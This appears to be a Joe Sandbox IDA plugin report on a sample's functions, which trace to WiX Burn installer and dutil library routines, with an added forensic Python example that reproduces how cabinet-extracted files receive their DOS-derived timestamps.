                                                                                                                                                          • Opcode ID: 1107931d0c56a6205a510f224f898a9ccfab87ac150862af2f9a0b04c0123adb
                                                                                                                                                          • Instruction ID: 4a09614d3ca843ea8fc48879366deed1c73b9815d1639a1d3e4c884d063fd266
                                                                                                                                                          • Opcode Fuzzy Hash: 1107931d0c56a6205a510f224f898a9ccfab87ac150862af2f9a0b04c0123adb
                                                                                                                                                          • Instruction Fuzzy Hash: FA212C32E40336FBD7205A989C47FABAA689B10714F17413BA902B7184F27C5D4092DA
                                                                                                                                                          APIs
                                                                                                                                                          • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 004395C6
                                                                                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004395D8
                                                                                                                                                          • SetFileTime.KERNEL32(?,?,?,?), ref: 004395EB
                                                                                                                                                          • CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,004390FA,?,?), ref: 004395FA
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Time$File$CloseDateHandleLocal
                                                                                                                                                          • String ID: Invalid operation for this state.$d:\a\wix\wix\src\burn\engine\cabextract.cpp
                                                                                                                                                          • API String ID: 609741386-4292832330
                                                                                                                                                          • Opcode ID: c2b3e8cffb58dbb8f65cce85fcbf5be41fd17bca71c55d689dbcd056dd678b82
                                                                                                                                                          • Instruction ID: 6c06349ec86f0ea72859a7cf247af5361c79d8c6fc428ff323c60139705469a2
                                                                                                                                                          • Opcode Fuzzy Hash: c2b3e8cffb58dbb8f65cce85fcbf5be41fd17bca71c55d689dbcd056dd678b82
                                                                                                                                                          • Instruction Fuzzy Hash: 1A21C872804219BBC710DF698C899AB7B6CFB08720F504267F915E66D0D3B8DD51CB98
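The four calls in the block above (DosDateTimeToFileTime, LocalFileTimeToFileTime, SetFileTime, CloseHandle) are the cabextract.cpp path of the WiX Burn engine code present in this sample: each file pulled out of the cabinet is stamped with the timestamp stored in the cabinet entry, a 16-bit DOS date/time pair with 2-second resolution in local time, converted to a FILETIME using the machine's current UTC bias. For triage this means the modification time of a file dropped this way reflects the archive entry, not the moment of extraction. The Python below is an added example, not Joe Sandbox or WiX code, that reproduces the conversion offline so the stored value can be checked against what is later read back from disk; the DOS words and the +120 minute offset are constructed inputs, and the offset is an explicit parameter because LocalFileTimeToFileTime applies the current bias rather than a per-date DST rule.

```python
"""DOS date/time -> FILETIME, mirroring the DosDateTimeToFileTime ->
LocalFileTimeToFileTime -> SetFileTime sequence in the cabinet-extraction path.
Added example (pure Python, runs offline), not Joe Sandbox or WiX code.
Sample inputs are constructed; the UTC offset is an assumption supplied by the caller."""
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
TICKS_PER_SECOND = 10_000_000   # FILETIME counts 100 ns intervals since 1601-01-01 UTC
DOS_EPOCH_YEAR = 1980


def dos_datetime_to_local(dos_date: int, dos_time: int) -> datetime:
    """Unpack a cabinet entry's 16-bit date and time words into a naive local datetime.
    date: bits 15-9 = year-1980, bits 8-5 = month, bits 4-0 = day
    time: bits 15-11 = hour, bits 10-5 = minute, bits 4-0 = second/2 (2 s resolution)
    datetime() raises ValueError for month/day 0 or hour > 23, the same inputs on
    which DosDateTimeToFileTime returns FALSE."""
    year = DOS_EPOCH_YEAR + ((dos_date >> 9) & 0x7F)
    month = (dos_date >> 5) & 0x0F
    day = dos_date & 0x1F
    hour = (dos_time >> 11) & 0x1F
    minute = (dos_time >> 5) & 0x3F
    second = (dos_time & 0x1F) * 2
    return datetime(year, month, day, hour, minute, second)


def is_valid_dos_datetime(dos_date: int, dos_time: int) -> bool:
    """True when the pair decodes to a real calendar time (what the extractor requires)."""
    try:
        dos_datetime_to_local(dos_date, dos_time)
        return True
    except ValueError:
        return False


def local_to_filetime(local: datetime, utc_offset_minutes: int) -> int:
    """Local -> UTC -> FILETIME. The bias is explicit: LocalFileTimeToFileTime uses
    the machine's current time-zone setting, not the DST rule in force on that date."""
    utc = (local - timedelta(minutes=utc_offset_minutes)).replace(tzinfo=timezone.utc)
    delta = utc - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * TICKS_PER_SECOND + delta.microseconds * 10


def filetime_to_utc_iso(filetime: int) -> str:
    """Inverse conversion, for a FILETIME read back from an $MFT record or event log."""
    return (FILETIME_EPOCH + timedelta(microseconds=filetime // 10)).isoformat()


def encode_dos_datetime(local: datetime) -> tuple[int, int]:
    """Pack a datetime the way a cabinet stores it; odd seconds are truncated."""
    dos_date = ((local.year - DOS_EPOCH_YEAR) << 9) | (local.month << 5) | local.day
    dos_time = (local.hour << 11) | (local.minute << 5) | (local.second // 2)
    return dos_date, dos_time


def cab_entry_filetime(dos_date: int, dos_time: int, utc_offset_minutes: int) -> int:
    """The value SetFileTime would receive for this entry on a machine with the given bias."""
    return local_to_filetime(dos_datetime_to_local(dos_date, dos_time), utc_offset_minutes)


if __name__ == "__main__":
    # Constructed cabinet entry: 2024-10-24 13:37:43 local, stored at 2 s resolution.
    d, t = encode_dos_datetime(datetime(2024, 10, 24, 13, 37, 43))
    print(hex(d), hex(t))                                   # 0x5958 0x6cb5
    print(dos_datetime_to_local(d, t))                      # 2024-10-24 13:37:42 (the 43 is lost)
    ft = cab_entry_filetime(d, t, utc_offset_minutes=120)   # assumed: machine set to UTC+2
    print(ft, filetime_to_utc_iso(ft))                      # 133742434620000000 2024-10-24T11:37:42+00:00
```

When comparing a dropped file's on-disk timestamp with the archive, allow for the 2-second truncation and for the bias of the victim machine at extraction time; a mismatch larger than that points to the file having been touched after extraction.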
                                                                                                                                                          APIs
                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,0045DB52,?,?,00000000,?,?,?,0045DCAC,00000022,FlsSetValue,004A27EC,004A27F4,?), ref: 0045DB04
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                          • API String ID: 3664257935-537541572
                                                                                                                                                          • Opcode ID: e7889416c23faad9a2c741454c5f54c366a01d1cd2b8caa6eadf0fccda3664e9
                                                                                                                                                          • Instruction ID: ccbd003d1c4037fdb7fa7a7dcdc219e9b012f34e258aff95dd90c1b83703c3d7
                                                                                                                                                          • Opcode Fuzzy Hash: e7889416c23faad9a2c741454c5f54c366a01d1cd2b8caa6eadf0fccda3664e9
                                                                                                                                                          • Instruction Fuzzy Hash: 36210535E06211ABCB319B249C40B5B3768EF41371F250262FC15A73A2DAB8ED08C6D9
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,00000001,00000000,?,00417261,00000001,00000080,?,00000000), ref: 00405B73
                                                                                                                                                          • GetLastError.KERNEL32(?,00417261,00000001,00000080,?,00000000,?,00418D09,00000001,00000140,?,?,?,?,?,000000B0), ref: 00405B80
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,00000001,00417261,?,00417261,00000001,00000080,?,00000000,?,00418D09,00000001,00000140), ref: 00405C10
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                          • String ID: Failed to open file: %ls$Failed to write to file: %ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                          • API String ID: 2528220319-2512000822
                                                                                                                                                          • Opcode ID: 469b366029f5e20c11686477cdbecb290cb07182ff267c73feb6e70e70adf947
                                                                                                                                                          • Instruction ID: a036cf87a8f5432173604349357c4b04caf10fd95255e0eb715f316a5ad05461
                                                                                                                                                          • Opcode Fuzzy Hash: 469b366029f5e20c11686477cdbecb290cb07182ff267c73feb6e70e70adf947
                                                                                                                                                          • Instruction Fuzzy Hash: 7C113B336417143BE73129148C0AFAB3B19DB41B70F114237FF147A1E1D6789C50AAE8
APIs
• PathAllocCanonicalize.KERNELBASE(?,?,0046CCF2), ref: 0046CBDF
• LocalFree.KERNEL32(00000000,00000000,?,?,0046CCF2,00000000,00000001,00000003,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0046CC4C
Strings
• d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\path2utl.cpp, xrefs: 0046CBF6, 0046CC32
• Failed to copy the canonicalized path., xrefs: 0046CC18
• Failed to initialize path2utl., xrefs: 0046CC26
• Failed to canonicalize: %ls, xrefs: 0046CBEA
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: AllocCanonicalizeFreeLocalPath
• String ID: Failed to canonicalize: %ls$Failed to copy the canonicalized path.$Failed to initialize path2utl.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\path2utl.cpp
• API String ID: 2828741713-460551743
• Opcode ID: 9a6720b0c3d28c937c0415e17d28e75ee9696e28a8181a3a37066562a5b58e92
• Instruction ID: d0f3b0e2a6d96dd83a567042605e7bedba59cb6e1962196c9dc8a47355350d23
• Opcode Fuzzy Hash: 9a6720b0c3d28c937c0415e17d28e75ee9696e28a8181a3a37066562a5b58e92
• Instruction Fuzzy Hash: FE113431E80324B7EB311B588C0AFAE3A50DB04B60F018053BD0CBA2D1F6AC9E1096DE
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00407C3E,00407DE7), ref: 00407BDA
• GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00407BF0
• GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00407C05
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
• API String ID: 667068680-1718035505
• Opcode ID: e3bbbc9f8d1473d6a6d7317dee48e6a5d08ab297cb70149c2f662b2d0fe83c00
• Instruction ID: 66e8f7bad9f35f3fd2383447beb7a85de4620c15531912c1d671696bae788255
• Opcode Fuzzy Hash: e3bbbc9f8d1473d6a6d7317dee48e6a5d08ab297cb70149c2f662b2d0fe83c00
• Instruction Fuzzy Hash: 7FF0D135F0E2125BAB304E641D54AA7279C4B1535531041BBE405F23D0E73CBC8182DF
APIs
• GetLastError.KERNEL32(?,?,0041D073,?,00000003,?,?), ref: 00470289
• GetLastError.KERNEL32(?,?,0041D073,?,00000003,?,?), ref: 0047031F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: ErrorLast
• String ID: Failed to allocate memory for certificate property.$Failed to get certificate property.$Failed to get size of certificate property.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\certutil.cpp
• API String ID: 1452528299-2025671064
• Opcode ID: c109259da9c87386dca63cfed68b21f96018c3085f02ebbaa04ebeec5fba8b79
• Instruction ID: b7bd13ce72fa66d6ed0891ed14e0c2c9f4472b6d29dffd52ffde98a2026090ce
• Opcode Fuzzy Hash: c109259da9c87386dca63cfed68b21f96018c3085f02ebbaa04ebeec5fba8b79
• Instruction Fuzzy Hash: 3D313972A42225BBE7316A518C49FAF2E1CDF11B60F01406ABD08BA2D1E77C8D0081E9
APIs
• lstrlenW.KERNEL32(89F84589,004221A7,00000000,00000000,?,0046F557,00000000), ref: 0046F378
Strings
• Failed to concatenate the dependency key name., xrefs: 0046F416
• Failed to add the string lengths together., xrefs: 0046F3C9
• d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\deputil.cpp, xrefs: 0046F425
• Failed to get string length of dependency name., xrefs: 0046F3A5
• Failed to allocate string for dependency registry root., xrefs: 0046F3F1
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: lstrlen
• String ID: Failed to add the string lengths together.$Failed to allocate string for dependency registry root.$Failed to concatenate the dependency key name.$Failed to get string length of dependency name.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\deputil.cpp
• API String ID: 1659193697-486736779
• Opcode ID: 4b54ea00d4dab682ff6733797825500d53f574e9e666a0f8d73cf9e914afeed0
• Instruction ID: 4c8e6b0c3825113c7e029879ecffe2cd4d544edc6c586d63fe74b462cd40699b
• Opcode Fuzzy Hash: 4b54ea00d4dab682ff6733797825500d53f574e9e666a0f8d73cf9e914afeed0
• Instruction Fuzzy Hash: BC210A32A80215B7DB125F51DC06F9F3F68DB21B61F104272F940BA2D1EBB88A40D79A
APIs
• GetLastError.KERNEL32(?,?,004546A1,004544BC,00451F84), ref: 004546B8
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004546C6
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004546DF
• SetLastError.KERNEL32(00000000,004546A1,004544BC,00451F84), ref: 00454731
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: c463de61136aa9bb0b132086c26b25d0ee55c149947cc9a65bfe5412d4db0b05
• Instruction ID: c33324891a8b3379342c18d165139fbb0076ca01a92028ef668e10022528cdab
• Opcode Fuzzy Hash: c463de61136aa9bb0b132086c26b25d0ee55c149947cc9a65bfe5412d4db0b05
• Instruction Fuzzy Hash: C301DE721082511AA72426B57C86A2B2B95EB827BF720033FF810882FBEF194CC9514D
APIs
• EnterCriticalSection.KERNEL32(0040951C,WixBundleOriginalSource,?,?,0041E86F,7D89F88B,WixBundleOriginalSource,00000001,0040951C,00000081,0040951C,7D89F88B,0040959C,?,?,7D89F88B), ref: 0040C01F
• LeaveCriticalSection.KERNEL32(0040951C,0040951C,00000000,00000000,?,?,0041E86F,7D89F88B,WixBundleOriginalSource,00000001,0040951C,00000081,0040951C,7D89F88B,0040959C,?), ref: 0040C0A4
Strings
• WixBundleOriginalSource, xrefs: 0040C01B
• d:\a\wix\wix\src\burn\engine\variable.cpp, xrefs: 0040C094
• Failed to get value of variable: %ls, xrefs: 0040C059
• Failed to get value as string for variable: %ls, xrefs: 0040C082
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: CriticalSection$EnterLeave
• String ID: Failed to get value as string for variable: %ls$Failed to get value of variable: %ls$WixBundleOriginalSource$d:\a\wix\wix\src\burn\engine\variable.cpp
• API String ID: 3168844106-2044190524
APIs
• CompareStringW.KERNEL32(00000000,00000001,?,000000FF,comres.dll,000000FF,00000000,?,00000000,00000000,comres.dll,wininet.dll,00000000,00000120,00000000,?), ref: 0041F1C2
Similarity
• API ID: CompareString
• String ID: Failed dependents check on package provider: %ls$comres.dll$d:\a\wix\wix\src\burn\engine\dependency.cpp$wininet.dll
• API String ID: 1825529933-2545241932
APIs
• ReadFile.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,?,0041BE04,?,00000000,00477850,00000000,00000000,00000000), ref: 00404857
• GetLastError.KERNEL32(?,0041BE04,?,00000000,00477850,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000001,?,WixBundleOriginalSource), ref: 004048CC
Similarity
• API ID: ErrorFileLastRead
• String ID: Failed to read from source.$Failed to write to target.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
• API String ID: 1948546556-2158701991
APIs
• CompareStringW.KERNEL32(00000000,00000001,?,000000FF,004777D8,000000FF,00000120,00000000,00000000,000004A0,00000120,00000214,00000000,00000000,00000000,?), ref: 00449375
Similarity
• API ID: CompareString
• String ID: BA aborted detect forward compatible bundle.$Failed to compare bundle version '%ls' to related bundle version '%ls'$d:\a\wix\wix\src\burn\engine\detect.cpp$msasn1.dll
• API String ID: 1825529933-2217324516
APIs
• SetFilePointerEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 004393E8
• GetLastError.KERNEL32(?,?,?), ref: 004393F2
Similarity
• API ID: ErrorFileLastPointer
• String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$d:\a\wix\wix\src\burn\engine\cabextract.cpp
• API String ID: 2976181284-2073548627
APIs
• RegCloseKey.ADVAPI32(00000000,?,Resume,00000000,?,?,00000001,?,00000000,00000000,00000024,?,?,?,00424914,00000120), ref: 004177E9
  • Part of subcall function 00467C83: RegQueryValueExW.ADVAPI32(?,?,?,0041775F,?,Resume,00000000,?,?,00000001,?,00000000,00000000,00000024), ref: 00467CB6
Strings
• Resume, xrefs: 00417752
• d:\a\wix\wix\src\burn\engine\registration.cpp, xrefs: 0041772E
• Failed to open registration key., xrefs: 0041771C
• Failed to read Resume value., xrefs: 00417780
Similarity
• API ID: CloseQueryValue
• String ID: Failed to open registration key.$Failed to read Resume value.$Resume$d:\a\wix\wix\src\burn\engine\registration.cpp
• API String ID: 3356406503-757597524
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memcpy_s
                                                                                                                                                          • String ID: Failed to ensure buffer size.$Failed to get string size.$Failed to write string to buffer: '%ls', error: %d$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\buffutil.cpp
                                                                                                                                                          • API String ID: 2001391462-494229206
                                                                                                                                                          • Opcode ID: 895a118f4c5df7ade2fa1686f315267a8860816c6542478db69ec910855a8aa7
                                                                                                                                                          • Instruction ID: d54c78b71b6dee5f6f3e41848993a6ce89698ba49e2602bb253f652d0659acb6
                                                                                                                                                          • Opcode Fuzzy Hash: 895a118f4c5df7ade2fa1686f315267a8860816c6542478db69ec910855a8aa7
                                                                                                                                                          • Instruction Fuzzy Hash: 4C31B571A00605BFE710DB58CC86FAB77A8DF06754F11406AF904FB381F3789E009A95
APIs
  • Part of subcall function 00467B72: RegOpenKeyExW.KERNELBASE(?,00467B6E,00000000,00000000,00000003,00000000,?,?,00470A51,80000002,00000000,00020019,00000000,00000000,SOFTWARE\Policies\,00000000), ref: 00467B9D
• RegCloseKey.ADVAPI32(00000000,00020019,?,?,000001D0,00000001,00000120), ref: 004717C4
  • Part of subcall function 00471630: RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,000001D0,?,00020019,?,00000000,00000000,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,?,?), ref: 004716DA
Strings
• Failed to open uninstall registry key., xrefs: 00471747
• SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00471713
• d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\butil.cpp, xrefs: 00471756
• Failed to enumerate uninstall key for related bundles., xrefs: 004717DA
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: Close$Open
• String ID: Failed to enumerate uninstall key for related bundles.$Failed to open uninstall registry key.$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\butil.cpp
• API String ID: 2976201327-1811623788
• Opcode ID: a1e5e801cee9613cc85f7e1ed03349f2f53f111aec68e1e3c65c3e75f1212c67
• Instruction ID: 174879dacb4f5ce48e7a816411a072e4312afde03739d9a3bc4dd4c7ab27ebb7
• Opcode Fuzzy Hash: a1e5e801cee9613cc85f7e1ed03349f2f53f111aec68e1e3c65c3e75f1212c67
• Instruction Fuzzy Hash: A5214B71E00224FADB25669DCC46FDFBAB8DF40744F118067F908B6161E27C4E40D799
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID:
• String ID: Failed to get full path for: %ls$Failed to get parent directory for path: %ls$Full path was not rooted: %ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dirutil.cpp
• API String ID: 0-2874153667
• Opcode ID: b46f5e48257232513acac22c7227be6d17b64e10d8d063c42a889c6ec4ccfe10
• Instruction ID: 809451187560bf8e0490e15f478be7f51a9778091751312aef0fd3a41476b0d0
• Opcode Fuzzy Hash: b46f5e48257232513acac22c7227be6d17b64e10d8d063c42a889c6ec4ccfe10
• Instruction Fuzzy Hash: 2821A871744208BAEB209AA5CE46FAF7ABD9F40744F50007BF905F61E1E678DE40D668
APIs
• CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,00000000,?,?,00000000,00000000,0000055C,00000560,000004A0,00000000,00000120), ref: 0041FABA
• CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,00000000,?,?,00000000,00000000,0000055C,00000560,000004A0,00000000,00000120), ref: 0041FAE6
Strings
• Failed dependents check on bundle., xrefs: 0041FA69
• d:\a\wix\wix\src\burn\engine\dependency.cpp, xrefs: 0041FA1C
• Failed to detect provider key bundle id., xrefs: 0041FA0A
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
